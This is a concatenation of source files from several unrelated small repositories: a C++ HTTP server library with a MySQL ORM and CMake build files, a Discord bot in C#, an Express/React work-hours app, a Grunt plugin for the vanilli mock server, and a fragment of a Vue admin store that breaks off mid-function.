13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, // 'A'-'Z'
0, 0, 0, 0, 0, 0,
26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38,
39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, // 'a'-'z'
};
size_t len = strlen(code);
for(int i = 0; i < len - 2; i += 4){ //decode in groups of four characters
dst += (decode64_table[code[i]]) << 2 | ((decode64_table[code[i + 1]]) >> 4); //6 bits of the first character combined with the top 2 data bits of the second
if(code[i + 1] == '=' || code[i + 2] == '='){break;}
dst += ((decode64_table[code[i + 1]]) << 4) | ((decode64_table[code[i + 2]]) >> 2); //bottom 4 bits of the second character combined with the next 4 bits of the third
if(code[i + 2] == '=' || code[i + 3] == '='){break;}
dst += ((decode64_table[code[i + 2]]) << 6) | (decode64_table[code[i + 3]]); //bottom 2 bits of the third character combined with the 6 bits of the fourth
}
}
};
}
}
#endif //BB_BASE64_H
<file_sep>/build/mysql_orm/include/mysql_orm/sql/dql.h
// Query (DQL)
// Created by 邦邦 on 2022/4/18.
//
#ifndef MYSQLORM_DQL_H
#define MYSQLORM_DQL_H
#include "dml.h"
namespace bb {
//pagination struct
struct PageData {
unsigned limit{}; //requested page length
unsigned long total_size{}; //total number of rows
unsigned long total_page{}; //total number of pages
};
class dql : public dml {
unsigned index_{}; //load-balancing index (not affected by other users' constructions)
std::string where_key_ = "*";
std::array<std::string, 2> where_sql_ = {"", ""};
public:
PageData page_data_; //paging info
std::vector<std::map<std::string, std::string>> data_; //fetched data
explicit dql();
public:
//model: get the class name
virtual std::array<std::string, 2> getName_();
//select the specified key(s)
dql *select(const std::string &key = "*");
dql *selectArr(const std::vector<std::string> &key);
//fetch by id
dql *find(const unsigned long &id = 1);
//where
dql *where(const std::string &key, const std::string &value);
dql *where(const std::string &key, const double &value);
dql *where(const std::string &key, const std::string &symbols, const std::string &value);
dql *where(const std::string &key, const std::string &symbols, const double &value);
//mainly for correctly matching null values
dql *notWhere(const std::string &key, const std::string &value);
dql *notWhere(const std::string &key, const unsigned long &value);
dql *notWhere(const std::string &key, const std::string &symbols, const std::string &value);
dql *notWhere(const std::string &key, const std::string &symbols, const unsigned long &value);
dql *orWhere(const std::string &key, const std::string &value);
dql *orWhere(const std::string &key, const unsigned long &value);
dql *orWhere(const std::string &key, const std::string &symbols, const std::string &value);
dql *orWhere(const std::string &key, const std::string &symbols, const unsigned long &value);
//sort order: ASC ascending, DESC descending
dql *order(const std::string &key, const std::string &type = "ASC");
//rows where key is between start_value and end_value, inclusive
dql *between(const std::string &key, const unsigned long &start_value, const unsigned long &end_value);
//rows whose value is null
dql *isNull(const std::string &key);
//rows whose value is not null
dql *isNotNull(const std::string &key);
//LIKE search: % matches any number of characters, _ matches a single character, \ escapes
dql *like(const std::string &key, const std::string &value);
public:
//paginate
dql *paginate(const unsigned &length = 100, const std::string &order_a = "ASC");
//turn to a given page
std::vector<std::map<std::string, std::string>> pageTurning(const unsigned &page = 1);
//run a query
dql *get_(const std::string &sql);
//show everything
int show_();
//get the fetched data
std::vector<std::map<std::string, std::string>> &get();
//print the fetched data
int show();
//show the indexes
int showIndex();
//inspect how the query is executed (EXPLAIN)
int explain();
//check whether a database exists
int isDB(const std::string &name);
//check whether a table exists
int isTable(const std::string &name);
};
}
#endif //MYSQLORM_DQL_H
<file_sep>/build/mysql_orm/cmake/mysql_ormTargets-release.cmake
#----------------------------------------------------------------
# Generated CMake target import file for configuration "Release".
#----------------------------------------------------------------
# Commands may need to know the format version.
set(CMAKE_IMPORT_FILE_VERSION 1)
# Import target "mysql_orm" for configuration "Release"
set_property(TARGET mysql_orm APPEND PROPERTY IMPORTED_CONFIGURATIONS RELEASE)
set_target_properties(mysql_orm PROPERTIES
IMPORTED_LINK_INTERFACE_LANGUAGES_RELEASE "CXX"
IMPORTED_LOCATION_RELEASE "${_IMPORT_PREFIX}/lib/libmysql_orm.a"
)
list(APPEND _IMPORT_CHECK_TARGETS mysql_orm )
list(APPEND _IMPORT_CHECK_FILES_FOR_mysql_orm "${_IMPORT_PREFIX}/lib/libmysql_orm.a" )
# Commands beyond this point should not need to know the version.
set(CMAKE_IMPORT_FILE_VERSION)
<file_sep>/build/bb/include/bb/file.h
//
// Created by 邦邦 on 2022/7/8.
//
#ifndef BB_FILE_H
#define BB_FILE_H
#include <string>
#include <vector>
#include <sys/stat.h> //S_IRWXU
#include <unistd.h> //access() and closing file descriptors (close)
namespace bb{
class file{
public:
static size_t mkdir_pF(std::string &dir){
std::vector<std::string> dir_list{};
std::string str;
for(auto &v:dir){
if(v == '.'){}else if(v == '/'){
if(!str.empty()){
dir_list.push_back(str);
str += '/';
}
}else{
str+=v;
}
}
if(!str.empty()){
dir_list.push_back(str);
}
for(auto &v:dir_list){
if(access(("./"+v).c_str(),F_OK) == -1){
mkdir(("./"+v).c_str(),S_IRWXU);
}
}
return dir_list.size();
}
};
}
#endif //BB_FILE_H
<file_sep>/build/bb/include/bb/http/Analyze.h
// Parse HTTP header information
// Created by 邦邦 on 2022/6/17.
#ifndef BB_ANALYZE_H
#define BB_ANALYZE_H
#include <cstring>
#include <string>
#include <map>
#include <utility>
#include "bb/Log.h"
namespace bb{
namespace http{
class Analyze{
int8_t n_type_{}; //newline style
//called from the constructor: parses the first line into method, path and treaty, then calls setGetMap_ to extract the GET parameters
void firstF_();
public:
char *r_buf; //raw received data
ssize_t r_size{}; //size of the received data
ssize_t start_index; //start position of the body content in the string; if the body is an array, body_arr_index marks the index
std::string method,path,treaty; //GET,/a1_get?aaa=123&bbb=bbb,HTTP/1.1
std::map<std::string, std::string> head_map; //header fields
std::map<std::string, std::string> get_map; //GET parameters
//splits the received data
explicit Analyze(char *r_buf,ssize_t &r_size);
//called from outside to obtain the posted data
bool getPost(std::map<std::string, std::string> &r_data);
bool getPost(std::map<std::string, std::string> &r_data,char *r_buf_1,ssize_t &start_index_1);
};
}
}
#endif<file_sep>/build/bb/cmake/bbTargets-release.cmake
#----------------------------------------------------------------
# Generated CMake target import file for configuration "Release".
#----------------------------------------------------------------
# Commands may need to know the format version.
set(CMAKE_IMPORT_FILE_VERSION 1)
# Import target "bb" for configuration "Release"
set_property(TARGET bb APPEND PROPERTY IMPORTED_CONFIGURATIONS RELEASE)
set_target_properties(bb PROPERTIES
IMPORTED_LINK_INTERFACE_LANGUAGES_RELEASE "CXX"
IMPORTED_LOCATION_RELEASE "${_IMPORT_PREFIX}/lib/libbb.a"
)
list(APPEND _IMPORT_CHECK_TARGETS bb )
list(APPEND _IMPORT_CHECK_FILES_FOR_bb "${_IMPORT_PREFIX}/lib/libbb.a" )
# Commands beyond this point should not need to know the version.
set(CMAKE_IMPORT_FILE_VERSION)
<file_sep>/build/bb/include/bb/http/Config.hpp
//HTTP configuration
#ifndef BB_CONFIG_H
#define BB_CONFIG_H
#include <map>
#include <string>
#include "bb/file.h"
namespace bb{
namespace http{
//cache html in memory
struct ST_html{
size_t size{}; //size of each chunk
char *buf{};
};
struct ST_html_arr{
size_t size{}; //total size
std::vector<ST_html> body{};
};
class Config{
Config(){
bb::file::mkdir_pF(web_dir);
bb::file::mkdir_pF(file_dir);
};
~Config(){
if(serve_cache){
for(auto &v:cache_html){
for(auto &vv:v.second.body){
delete []vv.buf;
}
}
}
};
public:
bool gzip=false; //gzip support
bool serve_cache=true; //server-side html caching
bool client_cache=true; //client-side html caching
std::string web_dir = "/html"; //web root directory
std::string file_dir = "/file"; //file directory
static const unsigned short SEND_MAX{1472}; //max bytes sent per write
static const unsigned short RECF_MAX{1500}; //max bytes received per read
std::map<std::string,ST_html_arr> cache_html{}; //in-memory html cache
//file extension to Content-Type mapping
std::map<std::string,std::string> content_type_{
{"html","text/html;charset=utf8"},
{"htm","text/html;charset=utf8"},
{"jsp","text/html;charset=utf8"},
{"txt","text/plain;charset=utf8"},
{"css","text/css;charset=utf8"},
{"ico","application/x-icon"},
{"js","application/javascript;charset=utf8"},
{"map","application/javascript;charset=utf8"}, //vue的js debug文件
{"xml","application/xml;charset=utf8"},
{"json","application/json;charset=utf8"},
{"jpg","image/jpeg"},
{"jpe","image/jpeg"},
{"jpeg","image/jpeg"},
{"gif","image/gif"},
{"png","image/png"},
{"mp3","audio/mp3"},
{"mp4","video/mpeg4"},
{"mpeg","video/mpg"},
{"default","text/html;charset=utf8"}
};
//build the HTTP response header
void head(std::string &s_head,const std::string &method,const std::string &state,const std::string &type,const size_t &size={},const bool &is_gzip=false,const bool &is_cache=false){
s_head = "HTTP/1.1 "+state+"\r\n"
"Content-Type: "+content_type_[type]+"\r\n"
"Access-Control-Allow-Method: "+method+"\r\n" //GET,POST,OPTIONS,PUT,DELETE,PATCH,HEAD(发PUT请求前会先发OPTIONS请求进行预检)
"Access-Control-Allow-Headers: x-requested-with,content-type\r\n" //x-requested-with,content-type包含Access-Control-Request-Headers附带的内容//info->head_data["Access-Control-Request-Headers"]
"Server: BB/4.0\r\n"; //服务器类型
//如果使用epoll必须指定文件长度,否则会一直等待,超时才会断开链接,浏览器才会请求下一个文件
if(size){s_head+="Content-Length: "+std::to_string(size)+"\r\n";}
if(is_gzip){s_head+="Content-Encoding:gzip\r\n";}
if(is_cache){s_head+="Cache-Control:max-age=28800\r\n";}
/*if(!info->head_data["Origin"].empty()){
"Access-Control-Allow-Origin: "+info->head_data["Origin"]+"\r\n" //等于*或Origin附带的内容(cors,如果请求中附带有Origin表示有跨域验证)
"Access-Control-Allow-Credentials: true\r\n"; //允许客户端携带验证信息(例如 cookie 之类的,Access-Control-Allow-Origin: *时不能为true)
}*/
s_head += "\r\n";
}
public:
static Config &obj(){
static Config bb_http_config;
return bb_http_config;
}
};
}
}
#endif<file_sep>/build/mysql_orm/include/mysql_orm/sql/dml.h
// Manipulation (DML)
// Created by 邦邦 on 2022/4/18.
//
#ifndef MYSQLORM_DML_H
#define MYSQLORM_DML_H
#include "ddl.h"
#include "dml_type.h"
namespace bb {
class dml : public dml_type {
std::array<std::string, 2> where_sql_ = {"", ""};
protected:
std::string DB_name_; //database name
std::string table_name_; //table name
public:
//send a statement to mysql
int query_(const std::string &sql);
protected:
//switch to a database, creating and connecting to it if it does not exist (name up to 64 chars)
int useDB(const std::string &name);
//create a database, name at most 64-10 chars
int createDB(const std::string &name);
//rename a database
int upDB(const std::string &old_name, const std::string &new_name);
//drop a database
int delDB(const std::string &name);
//switch table
int useTable(const std::string &name);
//create a table, name at most 64-10 chars, e.g. crud.createTable([](auto *data){data->int_("a12")->nullable_()->comment_("this is a1");})
int createTable(const std::string &name, void (*createF)(dml *));
//rename the table
int upTable(const std::string &name);
//drop the table
int delTable();
//append columns
int addCol(void (*createF)(dml *));
//rename a column (key) and change its type
int upColName(const std::string &old_key, void (*createF)(dml *));
//change a column's type (key)
int upColType(void (*createF)(dml *));
//drop a column (key)
int delCol(const std::string &key);
//drop multiple columns (keys)
int delCols(const std::vector<std::string> &key_arr);
//create an index; a full-text index only supports char, varchar and text
int addIndex_(const std::vector<std::string> &key_list, const short &type = 0);
int addIndex(const std::string &key, const short &type = 0);
//drop an index
int delIndex(const std::string &key);
public:
//truncate the table
int truncate();
//insert a row {{"key1","value1"},{"k2","v2"}}
int insert(const std::map<std::string, std::string> &data);
int insert(const std::map<std::string, double> &data);
//batch insert {"key1","key2"},{{"v1","v2"},{"v11","v22"}}
int insert(const std::vector<std::string> &key, const std::vector<std::vector<std::string>> &value);
int insert(const std::vector<std::string> &key, const std::vector<std::vector<double>> &value);
//update matching rows
int update(const std::vector<std::array<std::string, 2>> &data);
//delete matching rows (the where clause is built via DQL)
int del();
};
}
#endif //MYSQLORM_DML_H
<file_sep>/build/bb/include/bb/Token.h
//
// Created by 邦邦 on 2022/6/26.
//
#ifndef BB_TOKEN_H
#define BB_TOKEN_H
#include <set>
#include <string>
#include "Ran.h"
#include "Time.h"
#include "ssl/md5.hpp"
#include "ssl/base64.hpp"
#include "Log.h"
namespace bb{
class Token{
unsigned max_size_ = 10;
std::string token_db_path_ = "./token.db";
std::set<std::string> token_{};
Token();
~Token();
public:
static Token &obj();
void push(const char *accounts,std::string &token);
void dec(std::string &en_token,std::string &token);
bool is(std::string &token) const;
bool rm(std::string &token);
};
}
#endif //BB_TOKEN_H<file_sep>/build/bb/include/bb/Log.h
//
// Created by 邦邦 on 2022/4/22.
//
#ifndef BB_LOG_H
#define BB_LOG_H
#include <string>
#include <mutex>
#include <exception>
#include "Time.h"
namespace bb {
//__FILE__,__LINE__,__func__
class Log{
const char *log_path_ = "./bb.log"; //日志保存位置
std::string msg_arr_; //消息内容
Log()=default;
~Log();
public:
static Log &obj();
public:
//info messages
void info(std::string msg);
void info(std::string msg,const std::string &file_path);
void info(std::string msg,const std::string &file_path,const int &line);
//warning messages
void warn(std::string msg);
void warn(std::string msg,const std::string &file_path);
void warn(std::string msg,const std::string &file_path,const int &line);
//error messages
void error(std::string msg);
void error(std::string msg,const std::string &file_path);
void error(std::string msg,const std::string &file_path,const int &line);
};
}
#endif //BB_LOG_H
<file_sep>/Config.cmake.in
@PACKAGE_INIT@
#check that the paths are valid
set_and_check(@PROJECT_NAME@_INCLUDES "@PACKAGE_INCLUDES@")
set_and_check(@PROJECT_NAME@_LIBS "@PACKAGE_LIBS@")
set_and_check(@PROJECT_NAME@_CMAKE "@PACKAGE_CMAKE@")
#include the generated install target information
include("@PACKAGE_CMAKE@/@[email protected]")
#check that the required components exist
check_required_components(@PROJECT_NAME@)<file_sep>/CMakeLists.txt
cmake_minimum_required(VERSION 3.16)
set(CMAKE_CXX_STANDARD 20)
project(test VERSION 3.0.1)
set(CMAKE_BUILD_TYPE Release)
set(LIBRARY_OUTPUT_PATH ${CMAKE_BINARY_DIR}/lib)
set(EXECUTABLE_OUTPUT_PATH ${CMAKE_BINARY_DIR})
set(CMAKE_PREFIX_PATH ${CMAKE_SOURCE_DIR}/build/cmake/modules)
find_package(bb 4.0 REQUIRED NO_MODULE)
find_package(mysql REQUIRED NO_MODULE)
find_package(mysql_orm REQUIRED NO_MODULE)
include_directories(${bb_INCLUDES} ${mysql_INCLUDES} ${mysql_orm_INCLUDES} include)
add_executable(${PROJECT_NAME}_run main.cpp)
target_link_libraries(${PROJECT_NAME}_run -lpthread bb mysql_orm ${mysql_LIBS})
|
1007b036f233c21d542d9fee11adeb7b66cd833d
|
[
"Markdown",
"CMake",
"C++"
] | 28 |
Markdown
|
135356/BBMySQL
|
e70cc6011e85040fffe36d3f6a415b048b6fa05b
|
20b9a59c90daa466967b433ba07bfcf609bbeed8
|
refs/heads/main
|
<repo_name>itamar-mizrahi/wittix<file_sep>/client/src/App.js
import React from "react";
import Login from "./components/Login";
import "./components/main.scss";
export const Context = React.createContext();
const App = () => {
return (
<div className="App">
<Login />
</div>
);
};
export default App;
<file_sep>/server.js
const express = require("express");
const app = express();
var http = require("http").Server(app);
const path = require("path");
const bodyparser = require("body-parser");
app.use(bodyparser.urlencoded({ extended: false }));
app.use(bodyparser.json());
const start = require("./routes/api/start");
app.use("/api/start", start);
const end = require("./routes/api/end");
app.use("/api/end", end);
if (process.env.NODE_ENV === "production") {
app.use(express.static("client/build"));
app.get("*", (req, res) => {
res.sendFile(path.resolve(__dirname, "client", "build", "index.html"));
});
}
const PORT = process.env.PORT || 5000;
var server = http.listen(PORT, () => {
console.log("server is running on port", server.address().port);
});<file_sep>/client/src/components/Login.js
import React, { Component } from "react";
import axios from "axios";
class Login extends Component {
constructor(props) {
super(props);
this.state = {
rangeStart: 1,
rangeEnd: 1
};
}
startWork = () => {
axios.post("/api/start/startWork", {
range: this.state.rangeStart
}).then((res) => {
if (res.status === 200) {
// work session started
}
})
};
endWork = () => {
axios.post("/api/end/endWork", {
range: this.state.rangeEnd
}).then((res) => {
if (res.status === 200) {
// work session ended
}
})
};
render() {
return (
<div className="col-md-6 offset-md-3 col-sm-12">
<h1 style={{ marginTop: "15px" }} className="text-center">
Welcome to Work Hours
</h1>
<button style={{ margin: "20px" }} onClick={this.startWork}>
Start work
</button>
<button style={{ margin: "20px" }} onClick={this.endWork}>
End work
</button>
</div>
);
}
}
export default Login;
|
04c55bb4d8f52d086643d857428449d7f194673e
|
[
"JavaScript"
] | 3 |
JavaScript
|
itamar-mizrahi/wittix
|
513d8adc6f29fe873860651cb6ad0758743c9eef
|
ec01a014df02dfdef50c4b8c7ef287beb18c15a7
|
refs/heads/master
|
<file_sep>class Author < ActiveRecord::Base
validates_presence_of :name
validates_presence_of :email
validates_presence_of :zip_code
end
<file_sep>class Comments < ActiveRecord::Base
validates_presence_of :user
validates_presence_of :text
end
<file_sep>require 'spec_helper'
describe Author do
it {should have_valid(:name).when('<NAME>', '<NAME>', '<NAME>')}
it {should_not have_valid(:name).when(nil, '') }
it {should have_valid(:email).when('<EMAIL>', '<EMAIL>')}
it {should_not have_valid(:email).when(nil, '')}
it {should have_valid(:zip_code).when('17601', '03037', '19147')}
it {should_not have_valid(:zip_code).when(nil, '')}
end
<file_sep>require 'spec_helper'
describe Comments do
it {should have_valid(:user).when('<NAME>', '<NAME>')}
it {should_not have_valid(:user).when(nil, '')}
it {should have_valid(:text).when('your mac tips rule', 'ole')}
it {should_not have_valid(:text).when(nil, '')}
end
<file_sep>require 'spec_helper'
describe BlogPosts do
it {should have_valid(:title).when('Mac Tips and Tricks', 'Magarita Tips and Tricks')}
it {should_not have_valid(:title).when(nil, '') }
it {should have_valid(:body).when('<EMAIL>', '<EMAIL>')}
it {should_not have_valid(:body).when(nil, '')}
end
<file_sep>require 'spec_helper'
describe Category do
it {should have_valid(:type).when('work', 'personal')}
it {should_not have_valid(:type).when(nil, '')}
end
<file_sep>class Category < ActiveRecord::Base
validates_presence_of :type
end
|
59aa8e9b9c86eb67401f97588192b4a07d35c621
|
[
"Ruby"
] | 7 |
Ruby
|
LNauman/blog
|
9bf2ebff844de4618f687d60dd3443e84967cb49
|
080a22962864edc8b3956e4d5ab29a311e07f01b
|
refs/heads/master
|
<repo_name>yuanzhian/tua-api<file_sep>/test/__tests__/jsonp.test.js
import { fakeGetApi } from '@examples/apis-web/'
import { ERROR_STRINGS } from '@/constants'
jest.mock('fetch-jsonp')
/**
* @type {*}
*/
const fetchJsonp = require('fetch-jsonp')
const data = [0, 'array data']
const returnVal = { code: 0, data: 'array data' }
describe('mock data', () => {
test('mock object data', async () => {
fetchJsonp.mockResolvedValue({ json: () => data })
/**
* @type {*}
*/
const resData = await fakeGetApi.mockObjectData()
expect(resData.code).toBe(404)
})
})
describe('fake jsonp requests', () => {
test('async-common-params', async () => {
fetchJsonp.mockResolvedValue({ json: () => data })
const resData = await fakeGetApi.acp()
expect(resData).toEqual(returnVal)
})
test('array-data', async () => {
fetchJsonp.mockResolvedValue({ json: () => data })
const resData = await fakeGetApi.ap({})
expect(resData).toEqual(returnVal)
})
test('object-params', async () => {
fetchJsonp.mockResolvedValue({ json: () => data })
const resData = await fakeGetApi.op({ param3: 'steve' })
expect(resData).toEqual(returnVal)
})
test('invalid-req-type', () => {
return expect(fakeGetApi.irt({ param3: 'steve' }))
.rejects.toEqual(TypeError(ERROR_STRINGS.reqTypeFn('foobar')))
})
test('data should be passed through afterFn', async () => {
fetchJsonp.mockResolvedValue({ json: () => data })
const { afterData } = await fakeGetApi.afterData()
expect(afterData).toBe('afterData')
})
test('there must be some data after afterFn', async () => {
fetchJsonp.mockResolvedValue({ json: () => data })
const resData = await fakeGetApi.noAfterData()
expect(resData).toEqual(returnVal)
})
})
<file_sep>/docs/config/runtime.md
# 运行配置 <Badge text="1.0.0+"/>
运行配置指的是在接口实际调用时通过第二个参数传递的配置。这部分的配置优先级最高。
以下接口以导出为 `exampleApi` 为例。
```js
exampleApi.foo(
{ ... }, // the first argument carries the API parameters
{ ... } // the second argument carries the API configuration
)
```
## callbackName (callback function name)
When making a jsonp request, a callbackName is usually added so that caching can be used, but note that duplicate requests will raise an error.
```js
exampleApi.foo(
{ ... },
{ callbackName: `foo` }
)
```
## Other parameters
All parameters from the common configuration section (except `pathList`), as well as all parameters from the self configuration section, are valid here and take the highest priority.
* See [common configuration](./common.md) for details
* See [self configuration](./self.md) for details
|
38f6f8c3f51c52c0bb7d208a2d91b8bf0143955d
|
[
"JavaScript",
"Markdown"
] | 2 |
JavaScript
|
yuanzhian/tua-api
|
d867b9c9621ba0a79416b60fea8284ad42583370
|
f27f40833c315e0d3a55d7f885d953423bc5e72c
|
refs/heads/master
|
<file_sep>using System;
using System.Threading.Tasks;
using System.Reflection;
using Discord;
using Discord.WebSocket;
using Discord.Commands;
using Microsoft.Extensions.DependencyInjection;
using System.Collections.Generic;
using System.Linq;
using Microsoft.EntityFrameworkCore;
namespace DiscordBot
{
class Program
{
private CommandService _commands;
private DiscordSocketClient _client;
private IServiceProvider _services;
private static void Main(string[] args) => new Program().StartAsync().GetAwaiter().GetResult();
public async Task StartAsync()
{
_client = new DiscordSocketClient();
_commands = new CommandService();
// Avoid hard coding your token. Use an external source instead in your code.
string token = "<KEY>";
_services = new ServiceCollection()
.AddSingleton(_client)
.AddSingleton(_commands)
.BuildServiceProvider();
await InstallCommandsAsync();
try
{
await _client.LoginAsync(TokenType.Bot, token);
await _client.StartAsync();
_client.MessageUpdated += MessageUpdated;
_client.UserJoined += _client_UserJoined;
_client.GuildMemberUpdated += _client_GuildMemberUpdated;
_client.Ready += () =>
{
Console.WriteLine("Bot is connected!");
return Task.CompletedTask;
};
}
catch(Exception ex)
{
Console.WriteLine(ex.Message);
}
await Task.Delay(-1);
}
public async Task InstallCommandsAsync()
{
// Hook the MessageReceived Event into our Command Handler
_client.MessageReceived += HandleCommandAsync;
// Discover all of the commands in this assembly and load them.
await _commands.AddModulesAsync(Assembly.GetEntryAssembly());
}
private async Task HandleCommandAsync(SocketMessage messageParam)
{
// Don't process the command if it was a System Message
var message = messageParam as SocketUserMessage;
if (message == null)
return;
var context = new SocketCommandContext(_client, message);
if (message.Content.ToLower().Contains("i accept") && message.Author != _client.CurrentUser)
{
var user = context.User as SocketGuildUser;
await user.AddRoleAsync(context.Guild.Roles.First(r => r.Name == "Member"));
//await user.RemoveRoleAsync(context.Guild.Roles.First(r => r.Name == "everyone"));
await context.Channel.SendMessageAsync("Welcome to the community " + user.Mention);
return;
}
int argPos = 0;
// Determine if the message is a command, based on whether it starts with '!' or a mention prefix
if (!(message.HasCharPrefix('!', ref argPos) || message.HasMentionPrefix(_client.CurrentUser, ref argPos)))
return;
else
{
// Create a Command Context
// Execute the command. (result does not indicate a return value,
// rather an object stating if the command executed successfully)
var result = await _commands.ExecuteAsync(context, argPos, _services);
if (!result.IsSuccess)
await context.Channel.SendMessageAsync(result.ErrorReason);
}
}
private async Task MessageUpdated(Cacheable<IMessage, ulong> before, SocketMessage after, ISocketMessageChannel channel)
{
// If the message was not in the cache, downloading it will result in getting a copy of `after`.
var message = await before.GetOrDownloadAsync();
Console.WriteLine($"{message} -> {after}");
}
private async Task _client_UserJoined(SocketGuildUser arg)
{
await sendUserAcceptance(arg);
}
private async Task _client_GuildMemberUpdated(SocketGuildUser arg1, SocketGuildUser arg2)
{
if(arg1.Status == UserStatus.Offline && (arg2.Status == UserStatus.Idle || arg2.Status == UserStatus.Online))
await sendUserAcceptance(arg1);
}
private async Task sendUserAcceptance(SocketGuildUser user)
{
IRole toIgnore = user.Guild.Roles.First(r => r.Name == "Member");
if (!user.Roles.Contains(toIgnore))
{
var chat = _client.GroupChannels.First(c => c.Name == "welcome");
await chat.SendMessageAsync("Welcome to the server " + user.Mention + " In order to proceed you will need to accept the following rules " + Environment.NewLine + "If you are happy with the above please type **I Accept**");
}
else
return;
}
private async Task performDatabaseStuff()
{
using (var db = new BloggingContext())
{
var blogs = db.Blogs
.Include(blog => blog.Posts)
.ToList();
await db.Blogs.AddAsync(new Blog { Url = "http://blogs.msdn.com/adonet", Posts = new List<Post>() { new Post() { Content = "Test" } } });
//Awaiting database addition
var count = db.SaveChanges();
Console.WriteLine("{0} records saved to database", count);
Console.WriteLine();
Console.WriteLine("All blogs in database:");
foreach (var blog in db.Blogs)
{
Console.WriteLine(" - {0}", blog.Url);
}
}
}
}
}
<file_sep>using Discord.Commands;
using System.Threading.Tasks;
using Discord;
namespace DiscordBot
{
[Group("Schedule")]
public class InfoModule : ModuleBase<SocketCommandContext>
{
// ~say hello -> hello
[Command("add")]
[Summary("Add to schedule.")]
public async Task addScheduleAsync([Summary("Name of this Schedule to Add")] string name,[Summary("Days in mon-thu style")] string days, [Summary("Time in HH:MM format with 00:00-00:00 formatting")] string time, [Summary("Message to be displayed")] string message)
{
// ReplyAsync is a method on ModuleBase
await ReplyAsync("stuff");
}
[Command("remove")]
[Summary("Add to schedule.")]
public async Task removeScheduleAsync([Summary("Name of this Schedule to Remove")] string name)
{
// ReplyAsync is a method on ModuleBase
await ReplyAsync("stuff");
}
}
}
|
3599c6ee2ce325796350854cd15bf6bbe437ef50
|
[
"C#"
] | 2 |
C#
|
DatenThielt/WyvernRealmsBot
|
fe941944e86108e3b71dcab6a0beab0560d22c09
|
a80bbf3c5fa916bca357f69f0575fbd434b410ba
|
refs/heads/master
|
<repo_name>dimasiktehnik/scrollable-homepage<file_sep>/js/script.js
$(document).ready(function () {
$('#fullpage').fullpage({
licenseKey: '951BDF59-63F84E77-8768E365-3ACE3408',
scrollHorizontally: true,
anchors:['solution', 'engineering','carsharing','rental'],
menu: '#home-nav-list',
css3: true,
});
//menu
$('.nav-icon').click(function () {
$(this).toggleClass('open');
$('.menu-drop').toggleClass('open');
$('.header__logo').toggleClass('black');
});
});
|
dc34bda5e6b66ce20b2353a72fcc0148e9b28788
|
[
"JavaScript"
] | 1 |
JavaScript
|
dimasiktehnik/scrollable-homepage
|
5f85a923f378ae7c2df26c39feb61aa75d458eaf
|
26024b715fea7c38d47c35ef980742e6b69220bd
|
refs/heads/master
|
<file_sep>grunt-vanilli
=============
[](https://travis-ci.org/kelveden/grunt-vanilli)
> *IMPORTANT*: As of vanilli 3.x, this plugin is deprecated. Vanilli itself now provides its own javascript API that
> includes functions for managing the lifecycle of vanilli.
Grunt plugin for starting/stopping [vanilli](https://github.com/kelveden/vanilli).
Usage
-----
Installation:
npm install grunt-vanilli --save-dev
The plugin allows:
* Specification of the configuration for [vanilli](https://github.com/kelveden/vanilli) (see that project for configuration options).
* Starting vanilli with `vanilli:start`.
* Stopping vanilli with `vanilli:stop`.
Example
-------
vanilli: {
options: {
port: 14000,
logLevel: "debug"
}
}
...
grunt.loadNpmTasks('grunt-vanilli');
...
grunt.registerTask('test', ['vanilli:start', 'testmystuff', 'vanilli:stop' ]);
<file_sep>'use strict';
var vanilli = require('vanilli');
module.exports = function (grunt) {
var vanilliServer;
grunt.registerTask('vanilli', 'Start/Stop Vanilli', function (target) {
var config = this.options(),
targets = {
start: function () {
vanilliServer = vanilli.init(config);
vanilliServer.listen(config.port);
},
stop: function () {
vanilliServer.stop();
}
};
if (targets[ target ]) {
targets[ target ]();
} else {
throw new Error("Unrecognised target '" + this.target + "'.");
}
});
};
|
e72d26be0cea6c8a2d34c9a21d77b09fb64e2de1
|
[
"Markdown",
"JavaScript"
] | 2 |
Markdown
|
kelveden/grunt-vanilli
|
2c89df62ea5336573e80376413630c56e346a3ce
|
67656faffdf9d43372fbb4d02d2224adc3102023
|
refs/heads/master
|
<file_sep>var express = require('express');
var app = express();
var morgan = require('morgan');
var path = require('path');
var port = 3007;
app.use(morgan('dev'));
// set the front-end folder to serve public assets.
app.use(express.static('web'));
// set up our one route to the index.html file.
app.get('*', function (req, res) {
res.sendFile(path.join(__dirname + '/index.html'));
});
// Start the server.
app.listen(port);
console.log(`Listening on port ${port}...`);
console.log('Press CTRL+C to stop the web server...');<file_sep># LoginAuthentication
It is a small program for login authentication, written in Node.js.
## How to use?
Just embed this script in your login authentication portal.
After successful authentication it returns a JSON file that includes the user's data, which can be used further.
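Since this README does not pin down the exact response shape, the snippet below is only a hypothetical sketch of consuming the returned user JSON on the client side; the `name` and `role` fields are placeholders, not part of this project:

```javascript
// Hypothetical consumer for the JSON returned after a successful login.
// The field names below (name, role) are placeholders -- adapt them to
// whatever your authentication portal actually returns.
function describeUser(json) {
  const user = JSON.parse(json);
  return `${user.name} (${user.role})`;
}

// Example with a made-up payload:
console.log(describeUser('{"name":"Alice","role":"admin"}')); // → Alice (admin)
```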
|
ee3384d93027cbb15bccc613b7259879b7ca2f7e
|
[
"JavaScript",
"Markdown"
] | 2 |
JavaScript
|
evilreborn/loginAuthentication
|
2bee9b53f82951a29a2b71aaf0d41f2a40a0b3c2
|
0beeec65055879f3d8e9ac4e7a682765c722f2e5
|
refs/heads/master
|
<repo_name>swxu2005/vue-element-admin<file_sep>/src/store/modules/user.js
import { loginByUsername, getUserInfo, getUserPermissions } from '@/api/login'
import { setToken } from '@/utils/auth'
import user from './user_'
user.actions.LoginByUsername = ({ commit }, userInfo) => {
const username = userInfo.username.trim()
return new Promise((resolve, reject) => {
loginByUsername(username, userInfo.password).then(response => {
const data = response.data.data
commit('SET_TOKEN', data.token)
setToken(data.token)
resolve()
}).catch(error => {
reject(error)
})
})
}
user.actions.GetUserInfo = ({ commit, state }) => {
return new Promise((resolve, reject) => {
Promise.all([
getUserInfo(),
getUserPermissions()
]).then((result) => {
const userInfoResult = result[0].data.data
const userPermissionsResult = result[1].data.data
if (userPermissionsResult && userPermissionsResult.length > 0) { // verify the returned roles is a non-empty array
commit('SET_ROLES', userPermissionsResult)
} else {
reject('getInfo: roles must be a non-null array !')
}
commit('SET_NAME', userInfoResult.realName)
commit('SET_AVATAR', 'https://wpimg.wallstcn.com/f778738c-e4f8-4870-b634-56703b4acafe.gif')
commit('SET_INTRODUCTION', userInfoResult.introduction)
resolve(userPermissionsResult)
